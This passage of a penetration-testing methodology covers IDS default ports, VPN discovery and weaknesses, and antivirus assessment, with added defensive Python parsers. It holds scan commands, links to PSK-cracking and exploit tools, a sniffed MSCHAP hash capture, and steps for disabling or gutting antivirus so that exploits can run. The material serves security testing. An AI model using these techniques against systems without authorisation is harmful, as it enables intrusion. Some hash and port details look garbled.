(http://www-4.ibm.com/software/security/firstsecure/cross-site.html)
A network-based intrusion detection product that detects, logs and responds to intrusion
attempts in realtime. The Tivoli Cross-Site for Security product can protect against the
latest varieties of hacker attempts, such as denial of service, port scanning and attacks
specific to application services, including telnet, FTP and DNS. Made by IBM Corp.
11. Tcp_wrappers (ftp://ftp.cerias.purdue.edu/pub/tools/)
With this package you can monitor and filter incoming requests for the SYSTAT,
FINGER, FTP, TELNET, RLOGIN, RSH, EXEC, TFTP, TALK, and other network
services. Works fine with TCPdump, also from CERIAS.
12. Tcpdump (ftp://ftp.cerias.purdue.edu/pub/tools/)
We know this one. Still one of the best IDSs used today.
13. Snort (http://www.snort.org/)
Freeware network intrusion detection system, capable of performing real-time traffic
analysis and packet logging on IP networks. Widely used by sysadmins all over the
world, it’s the best free IDS around.
14. SilentRunner (http://www.silentrunner.com/)
Network security solution specifically designed to address the insider threat. A passive
network discovery LAN engine, consisting of ten major modules, permits the user to view
in real-time network topology and activity levels, display individual terminal activity,
create and execute Boolean logic alerts and sort and process network data for further
detailed visualization and analysis.
15. Security Manager (http://www.netiq.com/products/sm/default.asp)
NetIQ's Security Manager provides an advanced, central security console for real-time
security event monitoring and automated response, host-based intrusion detection,
event log consolidation, and security configuration management.
16. Patriot IDS (http://www.patriot-tech.com/ids.htm)
A real-time network attack recognition and response system. Designed for maximum
intrusion detection performance, superior security, and turnkey operations, Patriot’s IDS
provides the ultimate intrusion detection appliance. Powered by the "best of breed" Intel
components and Internet Security Systems’ RealSecure software, Patriot’s IDS offers
the highest level of protection for your network. The Patriot IDS consists of two
components: the Network IDS Console, and the Network IDS Engines.
17. eTrust Internet Defense (http://www3.ca.com/Solutions/Solution.asp?ID=271)
Delivers state-of-the-art network protection including protection against the deployment
and execution of Distributed Denial of Service attacks - an essential capability at a time
when networks are susceptible to an increasingly sophisticated array of attacks. A truly
comprehensive solution, eTrust Intrusion Detection includes an integrated anti-virus
engine with automatic signature updates. It’s an all-in-one option and can be used
successfully in any network environment, fast deployment time also.
18. Intruder Alert (http://www.axent.com/)
This tool monitors systems and networks in real-time to detect security breaches and
suspicious activities and will respond automatically according to your established
security policy. It works across your entire enterprise including LANs, WANs, intranets
and the Internet. It’s best for wide deployment on your entire network infrastructure.
M.19 DEFAULT PORTS – IDS/IPS
8.1.1.1 ISS PROVENTIA G200 REV A / REALSECURE SENSORS
Service Listening Port   Service Identified                    Available To
TCP 22                   SSH                                   Sensors
TCP 901                  Sensor Appliance                      Sensors
TCP 2998                 Sensor controller                     Sensors
TCP 12                   JDBC                                  Management server & event Console
TCP 2998                 Sensor Controller                     Management server & event Console
TCP 3996-3999            Application server                    Management server & event Console
TCP 90x (x=1,2,3…)       Sensors / RealSecure IDS collectors   Management server & event Console
Comments: open ports on Sensors; only one of these communication ports is open;
communication between sensors & management server; x varies as the number of
sensors or event collectors increases.
8.1.1.2 NAI MCAFEE ENTERCEPT 4.1
Service Listening Port   Service Identified   Comments
TCP/5005                 Management server    IPS agent uses this port
TCP 443                  HTTPS                Web console for mgmt
8.1.1.3 NAI MCAFEE INTRUSHIELD 4000
Service Listening Port   Service Identified   Available To         Comments
TCP 22                   SSH                  Sensor
UDP 169                  SNMP                 Sensor
TCP 80                   HTTP                 Management server
TCP 443                  HTTPS                Management server
TCP 8555                 Console              Management server    Console to management server
UDP 8500                 Proprietary          Management server    Sensor to management server
TCP 8501-8504            Proprietary          Management server    Sensor to management server
8.1.1.4 NETSCREEN-IDP 500
Service Listening Port   Service Identified   Available To / Comments
UDP 7201-7202            Proprietary          Sensor to Mgmt server
UDP 7101-7102            Proprietary          Mgmt server to sensor
TCP 7203                 Proprietary          GUI Mgmt Console
8.1.1.5 TIPPING POINT UNITYONE 1200
Service Listening Port   Service Identified   Available To         Comments
TCP 22                   SSH                  Sensors              Open for Sensors
TCP 443                  HTTPS                Sensors              Open for Sensors
UDP 161                  SNMP                 Sensors              Open for Sensors
TCP 23                   Telnet               Sensors              Optional, Disabled by default for sensors
TCP 80                   HTTP                 Sensors              Optional, Disabled by default for sensors
ICMP                     Ping                 Sensors              Optional, Disabled by default for sensors
TCP 22                   SSH                  Management server    Default Ports open on management server
TCP 443                  HTTPS                Management server    Default Ports open on management server
TCP 10042                SSL Java Client      Management server    Default Ports open on management server
UDP 8162-8163            SNMP                 Management server    Default Ports open on management server
UDP 500                  ISAKMP               Management server    Default Ports open on management server
TCP 23                   Telnet               Management server    Optional, Disabled by default for sensors
TCP 80                   HTTP                 Management server    Optional, Disabled by default for sensors
ICMP                     Ping                 Management server    Optional, Disabled by default for sensors
TCP 943                  GUI Console          Management server
8.1.1.6 NFR NID 320
Service Listening Port   Available To         Comments
TCP 1968                 Sensor
UDP 123                  Sensor               Optional; required for time synchronization
TCP 1968                 Management server
TCP 2010                 Management server
8.1.1.7 SYMANTEC MANHUNT
Service Listening Port   Service Identified   Comments
QSP protocol             Proprietary          Used for communication between administrative
                                              console and Manhunt Nodes
8.1.1.8 CISCO IDS
Service Listening Port   Service Identified          Available To         Comments
TCP 22                   SSH                         Sensor               Open on sensor
TCP 443                                              Sensor               Open on sensor
TCP 52514                                            Management server    Open on management station
TCP 9652                 Cisco Common Service Port   Management server    Open on management station
TCP 1272                                             Management server    Open on management station
TCP 10033                                            Management server    Open on management station
TCP 1741-1742            Web Console                 Management server    For Administration
N VPN SECURITY ASSESSMENT
N.1 INTRODUCTION
A Virtual Private Network (VPN) connects the components and resources of one network
over another network. VPNs accomplish this by allowing the user to tunnel through the
Internet or another public network in a manner that lets the tunnel participants enjoy the
same security and features formerly available only in private networks (see Figure 1).
N.2 VIRTUAL PRIVATE NETWORK
VPNs allow telecommuters, remote employees like salespeople, or even branch offices
to connect in a secure fashion to a corporate server located at the edge of the corporate
Local Area Network (LAN) using the routing infrastructure provided by a public
internetwork (such as the Internet). From the user's perspective, the VPN is a point-to-point
connection between the user's computer and a corporate server. The nature of the
intermediate internetwork is irrelevant to the user because it appears as if the data is
being sent over a dedicated private link.
N.2.1 Common Uses of VPNs
The next few subsections describe in more detail common VPN situations.
N.2.1.1 REMOTE USER ACCESS OVER THE INTERNET
VPNs provide remote access to corporate resources over the public Internet, while
maintaining privacy of information. Figure 2 shows a VPN used to connect a remote user
to a corporate intranet.
Figure 2. Using a VPN to connect a remote client to a private LAN
Rather than making a leased-line or long-distance (or 1-800) call to a corporate or
outsourced Network Access Server (NAS), the user first calls a local ISP NAS phone
number. Using the local connection to the ISP, the VPN software creates a virtual private
network between the dial-up user and the corporate VPN server across the Internet.
N.2.1.2 CONNECTING NETWORKS OVER THE INTERNET
There are two methods for using VPNs to connect local area networks at remote sites:
• Using dedicated lines to connect a branch office to a corporate LAN.
• Using a dial-up line to connect a branch office to a corporate LAN.
Figure 3. Using a VPN to connect two remote sites
N.2.1.3 CONNECTING COMPUTERS OVER AN INTRANET
In some corporate internetworks, the departmental data is so sensitive that the
department's LAN is physically disconnected from the rest of the corporate internetwork.
While this protects the department's confidential information, it creates information
accessibility problems for those users not physically connected to the separate LAN.
Figure 4. Using a VPN to connect to two computers on the same LAN
VPNs allow the department's LAN to be physically connected to the corporate
internetwork but separated by a VPN server. Note that the VPN server is NOT acting as
a router between the corporate internetwork and the department LAN. A router would
interconnect the two networks, allowing everyone access to the sensitive LAN. By using
a VPN, the network administrator can ensure that only those users on the corporate
internetwork who have appropriate credentials (based on a need-to-know policy within
the company) can establish a VPN with the VPN server and gain access to the protected
resources of the department. Additionally, all communication across the VPN can be
encrypted for data confidentiality. Those users who do not have the proper credentials
cannot view the department LAN.
N.3 BASIC VPN REQUIREMENTS
Therefore, at a minimum, a VPN solution should provide all of the following:
• User Authentication
• Address Management
• Data Encryption
• Key Management
• Multi-protocol Support
N.4 TUNNELING TECHNOLOGIES
Tunneling technologies have been in existence for some time. Some examples of
mature technologies include:
• SNA tunneling over IP internetworks
• IPX tunneling for Novell NetWare over IP internetworks
• New Tunneling technologies:
  o Point-to-Point Tunneling Protocol (PPTP).
  o Layer 2 Tunneling Protocol (L2TP).
  o IP Security (IPSec) Tunnel Mode.
N.5 PURPOSE
N.6 REQUIREMENT
N.7 OBJECTIVE
[Text]
N.8 EXPECTED RESULT
[Text]
N.9 METHODOLOGY / PROCESS
[Text]
Brief Intro and Table of Contents
N.10 VPN DISCOVERY
N.10.1 Concepts and Ports used
Virtual Private Networks (VPN) have become very popular these days. The benefits
associated with their implementation are a reduction of communication costs, and an “easy”
and “secure” way to interconnect devices or networks using the big public network, the
Internet.
VPNs can be implemented to accomplish two different scenarios:
• Remote access clients or roaming clients
  o The VPN server is configured to accept connections from anywhere. The security
    is related to the authentication and authorization mechanism put in place.
• Interconnect remote networks
  o The VPN server only accepts VPN connection attempts from certain IPs.
Both of these scenarios rely for their security on the encryption protocols used.
The protocols used are:
• IPSec
• PPTP
• L2TP
A VPN server could be discovered based on the ports that are open on the target, so
using a standard port scan could help.
Also a scan of IP options, looking for responses to GRE / ESP / etc.
According to the different responses, the associated protocols / scenarios are:
VPN Protocol   TCP/IP Protocol   Port / Option
PPTP           IP                47 (GRE)
PPTP           TCP               1723
IPSEC          UDP               500 (IKE)
IPSEC          IP                50 (ESP)
IPSEC          IP                51 (AH)
L2TP           UDP               1701
L2F            UDP               1701
Examples:
Finding an ISAKMP service (IPSec VPN Server) by looking for port 500 UDP
owner:~# nmap -P0 -sU -p 500 192.168.0.1
Starting nmap 3.55 ( http://www.insecure.org/nmap/ ) at 2004-08-14 09:51 ART
Interesting ports on target.com (192.168.0.1):
PORT    STATE SERVICE
500/udp open  isakmp
Nmap run completed -- 1 IP address (1 host up) scanned in 12.671 seconds
Finding a PPTP VPN Server by looking for port 1723 TCP
owner:~# nmap -P0 -sT -p 1723 192.168.0.1
Starting nmap 3.55 ( http://www.insecure.org/nmap/ ) at 2004-08-14 09:55 ART
Interesting ports on target.com (192.168.0.1):
PORT     STATE SERVICE
1723/tcp open  pptp
Nmap run completed -- 1 IP address (1 host up) scanned in 0.962 seconds
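When the scans above are run across a whole address range, the results are easier to work with as an inventory than as screens of nmap output. The following Python is an added example (not ISSAF's or nmap's own code) that reads nmap grepable output (-oG) and maps each host's open ports and IP protocols onto the VPN protocol table above. The scan lines are constructed, and the grepable field layout assumed here (port/state/protocol/owner/service/rpc/version for Ports:, number/state/name for Protocols: from an -sO scan) is an assumption about nmap's format rather than anything the page states. UDP results reported as open|filtered are kept but marked unconfirmed, because a UDP port that returns nothing cannot be told apart from a filtered one.

```python
import re
from typing import Dict, Iterator, List

# Taken from the VPN protocol / port table in this section.
VPN_PORTS = {
    ("tcp", 1723): "PPTP",
    ("udp", 500): "IPSec (IKE)",
    ("udp", 1701): "L2TP/L2F",
}
VPN_IP_PROTOCOLS = {47: "PPTP (GRE)", 50: "IPSec (ESP)", 51: "IPSec (AH)"}

# Constructed sample of nmap -oG lines (assumed layout, not real scan output).
SAMPLE_SCAN = [
    "# Nmap 3.55 scan initiated (constructed sample)",
    "Host: 192.168.0.1 (target.com)\tPorts: 500/open/udp//isakmp///, "
    "1723/open/tcp//pptp///, 22/open/tcp//ssh///\tIgnored State: closed (1)",
    "Host: 192.168.0.2 ()\tPorts: 1701/open|filtered/udp//l2tp///",
    "Host: 192.168.0.1 (target.com)\tProtocols: 47/open/gre/, 50/open/esp/",
    "Host: 192.168.0.3 ()\tStatus: Down",
]

HOST_RE = re.compile(r"^Host:\s+(\S+)")
LIVE_STATES = ("open", "open|filtered")


def _entries(field: str, prefix: str) -> Iterator[List[str]]:
    """Split 'Ports: a/b/c, d/e/f' into the '/'-separated parts of each entry."""
    for entry in field[len(prefix):].split(","):
        parts = entry.strip().split("/")
        if parts and parts[0]:
            yield parts


def vpn_exposure(grepable_lines: List[str]) -> Dict[str, List[str]]:
    """Map host -> list of VPN services found in nmap grepable output."""
    findings: Dict[str, List[str]] = {}
    for line in grepable_lines:
        match = HOST_RE.match(line)
        if not match:
            continue
        host = match.group(1)
        for field in line.split("\t")[1:]:
            if field.startswith("Ports:"):
                for parts in _entries(field, "Ports:"):
                    if len(parts) < 3:
                        continue
                    port, state, proto = int(parts[0]), parts[1], parts[2]
                    label = VPN_PORTS.get((proto, port))
                    if label and state in LIVE_STATES:
                        note = "" if state == "open" else " (unconfirmed: open|filtered)"
                        findings.setdefault(host, []).append(f"{label} on {proto}/{port}{note}")
            elif field.startswith("Protocols:"):
                for parts in _entries(field, "Protocols:"):
                    if len(parts) < 2:
                        continue
                    number, state = int(parts[0]), parts[1]
                    label = VPN_IP_PROTOCOLS.get(number)
                    if label and state in LIVE_STATES:
                        findings.setdefault(host, []).append(f"{label}, IP protocol {number}")
    return findings


if __name__ == "__main__":
    for host, services in vpn_exposure(SAMPLE_SCAN).items():
        print(host, "->", "; ".join(services))
```

Feed it the file written with `nmap -oG` for the TCP/UDP port scan and a second one from the `-sO` IP protocol scan; hosts that answer on GRE or ESP but show no IKE port are worth a second look, since they indicate a tunnel endpoint whose control channel is not where the table expects it.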
N.10.2
IPSec Discovery
IPSecScan is a tool that can scan either a single IP address or a range of IP addresses
looking for systems that are IPSec enabled.
[Download http://ntsecurity.nu/toolbox/ipsecscan/]
Example:
C:\VPN Security\tools>ipsecscan.exe 192.168.0.1 192.168.0.2
IPSecScan 1.1 - (c) 2001, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
- http://ntsecurity.nu/toolbox/ipsecscan/
192.168.0.1 IPSec status: Enabled
192.168.0.2 IPSec status: Indeterminable
N.11 VPN FINGERPRINTING
One of the techniques used for fingerprinting a VPN Server is to analyze the first packets
exchanged in an IKE negotiation. Because the RFC does not specify the timing and strategy
used for retransmission of UDP packets, all vendors implement retransmission
differently, and sometimes differently across firmware versions of the same product.
This technique is valid only for IKE-based VPN Servers.
The technique is described at http://www.nta-monitor.com/ike-scan/whitepaper.pdf
The tool that implements that technique is ike-scan, and it is available for the Linux /
Microsoft platforms.
http://www.nta-monitor.com/ike-scan/download.htm
N.12 IKE AGGRESSIVE MODE HACK
The purpose of this section is to find out whether the target VPN Server is configured to
accept IKE Aggressive Mode.
Most VPN Servers accept, or switch automatically to, Aggressive Mode if the client
requests it, and start using a PreShared Key (PSK).
The problem is that this PreShared Key is not sent encrypted, because the tunnel is not
established yet.
An attacking client can use this to discover the PreShared Key and hack the VPN Server.
There is a tool available for finding this vulnerability:
http://www.ernw.de/download/ikeprobe.zip
Also these tools are available:
http://ikecrack.sourceforge.net
http://www.oxid.it/cain.html
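On the defensive side, the same finding can be checked from the gateway's configuration before anyone probes it from the outside. The Python below is an added example, not part of ISSAF or of any IPsec product: it parses an ipsec.conf-style file and reports every connection that combines IKEv1 aggressive mode with pre-shared-key authentication, the combination this section warns about. The section/key syntax (`conn NAME` headers in column 0, indented `key=value` settings, inheritance from `conn %default`, `aggressive=`, `authby=`, `leftauth=`/`rightauth=`) follows the strongSwan/Openswan ipsec.conf layout as an assumption, and the sample configuration is constructed rather than taken from a real deployment.

```python
from typing import Dict, List, Tuple

# Constructed ipsec.conf-style sample (assumed strongSwan/Openswan syntax).
SAMPLE_IPSEC_CONF = """\
config setup
    charondebug="ike 1"

conn %default
    keyexchange=ikev1
    aggressive=yes          # inherited by every conn below unless overridden

conn roadwarrior-psk
    authby=secret           # pre-shared key + inherited aggressive mode: flagged
    left=%any
    right=%any

conn roadwarrior-cert
    aggressive=no
    leftauth=pubkey
    rightauth=pubkey

conn site-to-site
    aggressive=no           # main mode with a PSK: not flagged
    authby=secret
    right=203.0.113.10
"""

PSK_AUTHBY = {"secret", "psk", "xauthpsk"}
Section = Tuple[str, str]


def parse_ipsec_conf(text: str) -> Dict[Section, Dict[str, str]]:
    """Parse into {(kind, name): {key: value}}. Section headers start in column 0
    ('conn NAME', 'config setup'); settings are indented key=value lines."""
    sections: Dict[Section, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # drop comments
        if not line.strip():
            continue
        if not line[0].isspace():
            kind, _, name = line.strip().partition(" ")
            current = (kind, name.strip())
            sections[current] = {}
        elif current is not None:
            key, _, value = line.strip().partition("=")
            sections[current][key.strip()] = value.strip().strip('"')
    return sections


def effective_settings(name: str, sections: Dict[Section, Dict[str, str]]) -> Dict[str, str]:
    """A conn inherits everything in 'conn %default' and may override it."""
    merged = dict(sections.get(("conn", "%default"), {}))
    merged.update(sections[("conn", name)])
    return merged


def uses_psk(settings: Dict[str, str]) -> bool:
    return (settings.get("authby") in PSK_AUTHBY
            or settings.get("leftauth") == "psk"
            or settings.get("rightauth") == "psk")


def aggressive_psk_findings(text: str) -> List[str]:
    """Names of conns that combine aggressive mode with PSK authentication."""
    sections = parse_ipsec_conf(text)
    flagged = []
    for kind, name in sections:
        if kind != "conn" or name == "%default":
            continue
        settings = effective_settings(name, sections)
        if settings.get("aggressive", "no") == "yes" and uses_psk(settings):
            flagged.append(name)
    return flagged


if __name__ == "__main__":
    print("aggressive mode with PSK:", aggressive_psk_findings(SAMPLE_IPSEC_CONF))
```

The inheritance step matters in practice: a single `aggressive=yes` in `%default` silently turns every PSK road-warrior profile into a finding, and a review that only greps the individual `conn` blocks would miss it. The remediation is to set `aggressive=no` (main mode) for PSK connections or to move remote-access users to certificate or EAP authentication.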
N.13 PPTP/SECURITY FLAW
Many vulnerabilities have been discovered in the implementation of PPTP and its
related protocols (MPPE, MSCHAP, MSCHAPv2). Those vulnerabilities are explained in
the paper http://www.schneier.com/pptp.html
We could split the subject into two parts:
• PPTP Protocol Vulnerabilities: The protocol itself has been proved to be
vulnerable to some attacks mentioned in the Schneier paper. Microsoft has
patched those vulnerabilities, but it is still not recommended for high security
environments.
• PPTP Authentication mechanism: As PPTP is like a Remote Access
Connection to the VPN Server in Microsoft Environments, several protocols
could be used for the client authentication. Those are CHAP, MSCHAP,
MSCHAP V2, EAP. MSCHAP and MSCHAPv2 are vulnerable if a third party can
sniff the wire and then crack the hashes. For example the password sniffing
tool “dsniff” is capable of understanding the authentication protocols of a PPTP
VPN session establishment.
Example:
Using dsniff to catch a PPTP connection
owner:~# dsniff
dsniff: listening on eth0
08/15/04 03:05:13 gre 192.168.0.1 -> vpnserver.com (pptp)
DOMAIN\Username:0:9B310870A8D1CXEC:0000000000000000000000000
00000000000000000000000:6AF13DCD112407WDCSS04E398851DD4F40
BEDECCCF3D6FE13D
N.14 SPLIT TUNNELING HACK
This is applicable to remote end users that connect to a central location.
"Split tunneling" is the term used to describe a multiple-branch networking path. This
depends on the VPN Client Software and the policy that is implemented, but some
VPN Client software, when it connects to a remote location, only adds a route for the
remote network class, so only the traffic for the remote location is routed using the VPN
connection and all other traffic goes directly over the end user's Internet Connection.
This allows a remote attacker to access a corporate network using a compromised VPN
Client computer.
It is recommended to disable “split tunneling” and route all traffic over the VPN
Connection.
It is also desirable to make the VPN Server inspect the traffic from the connecting
clients.
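Whether a client is actually in full-tunnel mode can be verified from its routing table rather than from the VPN client's settings screen. The Python below is an added example, not part of ISSAF or of any VPN client: it reads `ip route` style lines, decides whether the routes via the VPN interface cover all of IPv4, and lists the destinations that longest-prefix matching still sends outside the tunnel. Two cases from the text are covered: the split-tunnel client that only added a route for the remote network, and a full-tunnel client that installs the two /1 halves over the existing default route. The route lines are constructed with documentation address ranges; the interface name `tun0` and the line format are assumptions.

```python
import ipaddress
from typing import List, Tuple

Route = Tuple[ipaddress.IPv4Network, str]
ALL_IPV4 = ipaddress.ip_network("0.0.0.0/0")

# Constructed `ip route` output for a client whose VPN interface is tun0.
SPLIT_TUNNEL_ROUTES = [
    "default via 192.0.2.1 dev eth0 proto dhcp metric 100",
    "10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.6",
    "10.10.0.0/16 via 10.8.0.1 dev tun0",
    "192.0.2.0/24 dev eth0 proto kernel scope link src 192.0.2.50",
]
FULL_TUNNEL_ROUTES = [
    "default via 192.0.2.1 dev eth0 proto dhcp metric 100",
    "0.0.0.0/1 via 10.8.0.1 dev tun0",
    "128.0.0.0/1 via 10.8.0.1 dev tun0",
    "10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.6",
    "192.0.2.0/24 dev eth0 proto kernel scope link src 192.0.2.50",
    "203.0.113.5 via 192.0.2.1 dev eth0",   # host route to the VPN server itself
]


def parse_routes(lines: List[str]) -> List[Route]:
    """(destination, device) for each `ip route` line; 'default' is 0.0.0.0/0."""
    routes: List[Route] = []
    for line in lines:
        parts = line.split()
        if not parts:
            continue
        dest = ALL_IPV4 if parts[0] == "default" else ipaddress.ip_network(parts[0], strict=False)
        device = parts[parts.index("dev") + 1] if "dev" in parts else ""
        routes.append((dest, device))
    return routes


def is_full_tunnel(lines: List[str], vpn_dev: str) -> bool:
    """True when the routes via the VPN interface cover all of IPv4, whether as a
    replaced default route or as the two /1 halves some clients install."""
    vpn_nets = [dest for dest, dev in parse_routes(lines) if dev == vpn_dev]
    return list(ipaddress.collapse_addresses(vpn_nets)) == [ALL_IPV4]


def tunnel_bypasses(lines: List[str], vpn_dev: str) -> List[str]:
    """Destinations that longest-prefix routing still sends outside the VPN.
    A non-VPN route is overridden only if more specific VPN routes cover all of it."""
    routes = parse_routes(lines)
    vpn_nets = [dest for dest, dev in routes if dev == vpn_dev]
    bypasses = []
    for dest, dev in routes:
        if dev == vpn_dev:
            continue
        finer = [n for n in vpn_nets if n.prefixlen > dest.prefixlen and n.overlaps(dest)]
        covered = any(dest.subnet_of(c) for c in ipaddress.collapse_addresses(finer))
        if not covered:
            bypasses.append(str(dest))
    return bypasses


if __name__ == "__main__":
    for label, table in (("split", SPLIT_TUNNEL_ROUTES), ("full", FULL_TUNNEL_ROUTES)):
        print(label, "full tunnel:", is_full_tunnel(table, "tun0"),
              "bypasses:", tunnel_bypasses(table, "tun0"))
```

In the full-tunnel case the only remaining bypasses are the local LAN prefix and the host route to the VPN server, both of which are necessary for the tunnel to work at all; anything else in that list is the split-tunnel exposure the text describes.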
N.15 VULNERABILITIES AND EXPLOITS
Here you can find some of the most important vulnerabilities and exploits for different
platforms.
PPTP Flaws and Exploits:
• Vendor Information: http://www.securiteam.com/windowsntfocus/5HP0B0U3FC.html
• Exploit: http://www.insecure.org/sploits/NT.RAS.PPTP.html
Checkpoint VPN Server:
Several vulnerabilities have been discovered for the Checkpoint family of VPN
Servers.
• 2/4/2004 - Checkpoint VPN-1/SecureClient ISAKMP Buffer Overflow
  o ISS X-Force has discovered a flaw in the ISAKMP processing for
    both the Checkpoint VPN-1 server and Checkpoint VPN clients
    (Securemote/SecureClient). These products collaborate to provide
    VPN access to corporate networks for remote client computers.
    VPN-1 is the VPN component commonly deployed on Checkpoint
    Firewall-1 installations. The IKE component of these products
    allows for the unidirectional or bidirectional authentication of two
    remote nodes as well as the negotiation of cryptographic
    capabilities and keys. A buffer overflow vulnerability exists when
    attempting to handle large certificate payloads.
  o http://xforce.iss.net/xforce/alerts/id/163
• 9/3/2002 - SecuRemote usernames can be guessed or sniffed using IKE exchange
  o While performing a VPN security analysis for one of our
    customers, I discovered a potential issue with Firewall-1
    SecuRemote IKE which can allow usernames to be guessed. I
    also observed the related issue that the SecuRemote IKE
    usernames are passed in the clear which allows them to be
    discovered by network sniffing.
  o http://www.nta-monitor.com/news/checkpoint.htm
• 18/7/2001 - Checkpoint Firewall-1 Information Leakage (SecuRemote, Exploit)
  o Checkpoint Firewall-1 makes use of a piece of software called
    SecuRemote (a.k.a. SecureRemote) to create encrypted sessions
    between users and FW-1 modules. Before remote users are able
    to communicate with internal hosts, a network topology of the
    protected network is downloaded to the client. While newer
    versions of the FW-1 software have the ability to restrict these
    downloads to only authenticated sessions, the default setting
    allows unauthenticated requests to be honored. This gives a
    potential attacker a wealth of information including IP addresses,
    network masks, and even friendly descriptions.
  o http://www.securiteam.com/securitynews/5HP0D2A4UC.html
CISCO VPN Servers
• 31/8/2004 - Vulnerabilities in Kerberos 5 Implementation
  o Two vulnerabilities in the Massachusetts Institute of Technology
    (MIT) Kerberos 5 implementation that affect
    Cisco VPN 3000 Series Concentrators have been announced by
    the MIT Kerberos Team. Cisco VPN 3000 Series Concentrators
    authenticating users against a Kerberos Key Distribution Center
    (KDC) may be vulnerable to remote code execution and to Denial
    of Service (DoS) attacks. Cisco has made free software available
    to address these problems. Cisco VPN 3000 Series Concentrators
    not authenticating users against a Kerberos Key Distribution
    Center (KDC) are not impacted.
  o http://www.cisco.com/warp/public/707/cisco-sa-20040831krb5.shtml
N.16 GLOBAL COUNTERMEASURES
[Text]
O ANTI-VIRUS SYSTEM SECURITY ASSESSMENT AND
MANAGEMENT STRATEGY
O.1 DESCRIPTION
With extensive connectivity across networks within the company, with external
networks & with the Internet, the proliferation of viruses is a real cause of concern & needs to
be addressed with stern measures. This document briefly spells out Antivirus system
security assessment and its management strategy (i.e. the user policies that are
required & the configuration guidelines for the Antivirus administrator).
Primarily, Anti-virus programs can be divided into two types: those installed on
network infrastructure and those installed on end-user machines. Both have
their own importance.
The network infrastructure Anti-virus programs are commonly installed with the Firewall and
with Mail Servers. These programs are good at removing viruses at the network level only
and help greatly to stop them spreading.
The programs installed on end-user machines protect on a host basis and they don't have an
effect on host performance. These programs rely on end user signatures, which is not
always effective.
O.2 PURPOSE
O.3 REQUIREMENT
[Text]
O.3.1 Understand Organization’s environment
[Text]
O.3.2 Technical Requirements
[Text]
O.4 OBJECTIVE
Viruses, worms, Trojan horses and macros can cause significant damage to the information
& IT assets of an organization. As a result, proper policies, procedures and safeguards
shall be put in place to control them.
O.4.1 Perspective One
e.g. Security Assessor/Penetration Tester
O.4.2 Perspective Two
e.g. System Administrator
O.5 EXPECTED RESULT
[Text]
O.6 METHODOLOGY / PROCESS
1. EICAR ANTI VIRUS TEST FILE
(http://www.eicar.org/anti_virus_test_file.htm)
2. ZIP-OF-DEATH TEST
3. SENDING MAILS WITH WORDINGS LIKE *MIDDLESEX*
4. MAIL BOMBING TEST
5. Disabling of Auto Protection
6. Stopping/Disabling of antivirus services by normal privileges
(These two are more likely to be performed when you're already "in".)
7. Delete all executables and dll's found in the AV installation directory.
"...The effect is to leave the "shell" of the AVS on the machine, while removing all the
working parts. Kind of like stealing the PC from the inside, leaving the empty case
behind...."
O.6.1 Anti Virus test file
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
www.eicar.org/anti_virus_test_file.ht
Tools
Countermeasures
Remarks
O.6.2 Zip-of-Death test
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
O.6.3 Sending mails with wordings like *Middlesex*
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
O.6.4 Mail bombing test
Description
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
Tools
Countermeasures
Remarks
O.6.5 Stopping/Disabling of antivirus services by normal privileges
Description
If you're a local user with no special privileges, you can still disable some antivirus
programs using the Spanish tool VeoVeo (or any other tool that enables greyed controls);
for example this works against McAfee 4.x.
Useful to allow the use of exploits like DebPloit, which are sometimes reported as malware.
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
http://www.hackindex.com/download/veoveo.zip
Tools
Spanish Tool VeoVeo
Countermeasures
Remarks
O.6.6 Delete all executables and dll's found in the AV installation directory
Description
"...The effect is to leave the "shell" of the AVS on the machine, while removing all the
working parts. Kind of like stealing the PC from the inside, leaving the empty case
behind...."
Source: 2600 HQ Vol. 21
Pre-requisites
Examples/Results
Analysis/Conclusion/Observation
Links
2600 HQ Vol. 21
Tools
Countermeasures
Remarks
O.7 AUDIT ANTIVIRUS MANAGEMENT STRATEGY
O.7.1 Check Anti Virus System Standards
1. Segress’ Technical Infrastructure Management (TIM) department evaluates and approves the
anti-virus and anti-worm software used by the company. Segress TIM is using
<Product Name e.g. Norton Antivirus> Antivirus (NAV) for central anti-virus
management.
2. Virus checking systems (NAV clients) approved by the Segress TIM department are installed
on all personal computers, laptops and servers.
3. The organization's entire anti-virus solution is set up in such a way that the latest
versions of the anti-virus software are automatically updated on every server and
desktop from a designated anti-virus server. This is a key aspect of centralized
management, as the status of all anti-virus servers belonging to different locations is
known and monitored.
4. The default settings of the anti-virus software are configured to offer adequate security
to detect all viruses/worms at the immediate point of entry. This applies to all
server-based (Internet mail, proxy) and desktop-based systems.
5. Detective scans are also undertaken/scheduled automatically at predetermined intervals.
6. Users are not granted access to turn off or disable virus-checking systems.
7. User possession or development of viruses or other malicious software is prohibited.
8. Being a centrally managed system, all virus events are logged at the primary (central)
anti-virus server. These log files are continuously monitored for changes to the systems'
configuration and for all virus activity. Appropriate action is taken on finding virus activity,
such as running third-party software in the event that the current anti-virus program is not
able to disinfect the systems.
O.7.2 Check End User Antivirus Guidelines
• Anti-virus must be installed and running on the system
Make sure you have a virus protection program installed on your computer/desktop and
be sure it updates its virus definitions regularly. Segress TIM has decided on <XYZ
vendor> as the corporate standard antivirus program.
• Backup critical files
The only reliable method to guard against loss of data to virus infections is to back up the
critical files on some other media. Identify the critical files and folders that require backing
up.
• Do not share folders without passwords
The newer generation of viruses is more intelligent: they scan for folders that are
shared on the Windows network without passwords and often infect or delete the files
within them. Users must protect their folders with a difficult-to-guess password and share
them with individuals only on a need-to-know basis.
• Make sure that the antivirus updates are the latest
E.g. Norton Antivirus has a feature called "Live Update" that allows it to go out on the web
and get the latest virus definitions. The anti-virus definitions are updated automatically,
but if there is a problem this might have to be done manually. You can schedule Live
Update to occur on a regular basis: once a week is reasonable. Check the software
periodically to make sure it is doing the updates. You can always update it manually if
need be.
• Do not turn off PC scans
The antivirus installed on your system may have been scheduled to scan your system at
regular intervals. Do not turn off or terminate this system scan.
• Trash questionable e-mail messages
Don't open questionable e-mail messages or attachments; just trash them. Segress is
using Lotus Notes. This being a more secure system, the likelihood of virus attacks using
